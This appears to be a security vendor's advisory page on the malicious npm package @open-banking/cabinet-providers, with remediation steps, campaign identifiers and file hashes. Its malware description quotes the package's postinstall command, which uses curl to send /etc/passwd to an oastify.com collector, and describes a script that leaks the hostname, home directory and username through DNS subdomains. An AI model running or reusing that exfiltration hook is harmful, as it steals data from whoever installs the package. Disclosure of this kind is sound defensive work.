Which versions of @open-banking/cabinet-providers are malicious?

The following npm versions of @open-banking/cabinet-providers are flagged malicious: 999.9.2, 999.9.5. Treat any of these as compromised.

How do I remediate @open-banking/cabinet-providers if I installed it?

Remove @open-banking/cabinet-providers from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is @open-banking/cabinet-providers part of a known attack campaign?

Yes — @open-banking/cabinet-providers is associated with the IN-MAL-2026-004960, IN-MAL-2026-004957, IN-MAL-2026-004958, IN-MAL-2026-004959 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect @open-banking/cabinet-providers in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking @open-banking/cabinet-providers and packages like it before any post-install script runs.

Malicious package

@open-banking/cabinet-providersnpm

Malicious code in @open-banking/cabinet-providers (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5392

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall @open-banking/cabinet-providers

What this malware does

@open-banking/[email protected] is a dependency-confusion bait package (anomalously high version under a generic scope) that exfiltrates installer data via its postinstall lifecycle. package.json declares "postinstall": "node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com", which posts the contents of /etc/passwd (prefixed by the installer's hostname as a subdomain) to a Burp Collaborator (OAST) endpoint. The bundled scripts/scream3gg.js hex-encodes os.hostname(), os.homedir(), and os.userInfo().username, splits the result into 50-character chunks joined by ., and fetches http://<chunks>.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com over plain HTTP — leaking host identity through DNS-style subdomain encoding. Both behaviors fire automatically on npm install with no user consent.

Malicious versions

2 flagged

999.9.2999.9.5

Indicators of compromise (SHA-256)

1c1de2e003fc91eaf208c2c89119ca1390a5aefc53409c150e2181dd62ae8462

376acc0a3b29a3d768a5be7ea618329182989929f9e31fac8c176836b7c4b280

3eb304356656c325d4ab5185af3ffd5679fe5c9d2f7be46bc7c47d4bad94b42f

897ab059e2133dd6c2a8a23dea4e3e39006ca89a2ed3350db82cb9ad063ce408

Frequently asked questions

No. @open-banking/cabinet-providers on npm has been identified as a malicious package (versions 999.9.2, 999.9.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004960IN-MAL-2026-004957IN-MAL-2026-004958IN-MAL-2026-004959

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection